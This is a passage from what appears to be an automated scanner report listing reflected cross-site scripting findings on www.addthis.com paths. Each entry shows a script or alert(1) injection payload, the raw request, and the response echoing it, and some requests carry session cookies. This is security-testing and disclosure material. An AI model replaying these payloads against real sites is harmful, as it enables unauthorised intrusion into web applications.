Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:10:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/favicon.ico278d6"-alert(1)-"ce0f54c8f21";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.97. http://www.addthis.com/labs/sharebar [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a74f<script>alert(1)</script>b715ff394f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs2a74f<script>alert(1)</script>b715ff394f5/sharebar HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r1uiniigtcm2o9665dceg3l7a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs2a74f<script>alert(1)</script>b715ff394f5/sharebar</strong>
...[SNIP]...

2.98. http://www.addthis.com/labs/sharebar [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e40"-alert(1)-"f69a97632a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labs98e40"-alert(1)-"f69a97632a6/sharebar HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=s25hh7o8aj9hivfipoa2r9g376; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1449
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labs98e40"-alert(1)-"f69a97632a6/sharebar";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

2.99. http://www.addthis.com/labs/sharebar [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 22a81<script>alert(1)</script>017d8df923a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs/sharebar22a81<script>alert(1)</script>017d8df923a HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=9505qf7soqfl8tp9tjhbvrnva0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs/sharebar22a81<script>alert(1)</script>017d8df923a</strong>
...[SNIP]...

2.100. http://www.addthis.com/labs/sharebar [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea60"-alert(1)-"fb95837da68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labs/sharebarbea60"-alert(1)-"fb95837da68 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=t0jjtrn86ervt30up9qccjvna3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1449
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labs/sharebarbea60"-alert(1)-"fb95837da68";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.101. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48c30<script>alert(1)</script>97c119f9d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=gumktcoa631jau9eq58bo3a6n4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1477
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/</strong>
...[SNIP]...

2.102. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"015370cd7b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labsc3c93"-alert(1)-"015370cd7b1/sharebar/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4vvuq8gvavofrrm6aajh0vbc10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labsc3c93"-alert(1)-"015370cd7b1/sharebar/";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

2.103. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b79e<script>alert(1)</script>6e72fe07aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4o1js9c6qoqlapr84rrevdmjm7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1477
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/</strong>
...[SNIP]...

2.104. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab65"-alert(1)-"a907e3ac5d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=0mcpu733knmj17rqsvpush0ek3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._ge
...[SNIP]...

2.105. http://www.addthis.com/services/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b687"-alert(1)-"5544c0af5fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services6b687"-alert(1)-"5544c0af5fb/submit HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ro0pprbgg02gv0ps8843aufqj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1453
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services6b687"-alert(1)-"5544c0af5fb/submit";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _g
...[SNIP]...

2.106. http://www.addthis.com/services/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d48f3<script>alert(1)</script>7fec965f9fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicesd48f3<script>alert(1)</script>7fec965f9fb/submit HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=u4ab98dm5nk5ev3e48a1bl69a7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1479
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>servicesd48f3<script>alert(1)</script>7fec965f9fb/submit</strong>
...[SNIP]...

2.107. http://www.addthis.com/services/submit [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f28ad"-alert(1)-"9b939b22c7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submitf28ad"-alert(1)-"9b939b22c7d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=epv9ku1jg9s8m3t3j94jsm1c34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1453
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submitf28ad"-alert(1)-"9b939b22c7d";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.108. http://www.addthis.com/services/submit [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57fdb<script>alert(1)</script>57c7a554130 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb<script>alert(1)</script>57c7a554130 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r6d67jvi441r6bg5srbf399u47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1479
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb<script>alert(1)</script>57c7a554130</strong>
...[SNIP]...

2.109. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12552"-alert(1)-"62b69e85072 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services12552"-alert(1)-"62b69e85072/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services12552"-alert(1)-"62b69e85072/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combinat
...[SNIP]...

2.110. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ab00<script>alert(1)</script>7d42c08a525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services2ab00<script>alert(1)</script>7d42c08a525/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services2ab00<script>alert(1)</script>7d42c08a525/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC</strong>
...[SNIP]...

2.111. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a7b"-alert(1)-"0a892740684 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C75a7b"-alert(1)-"0a892740684/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

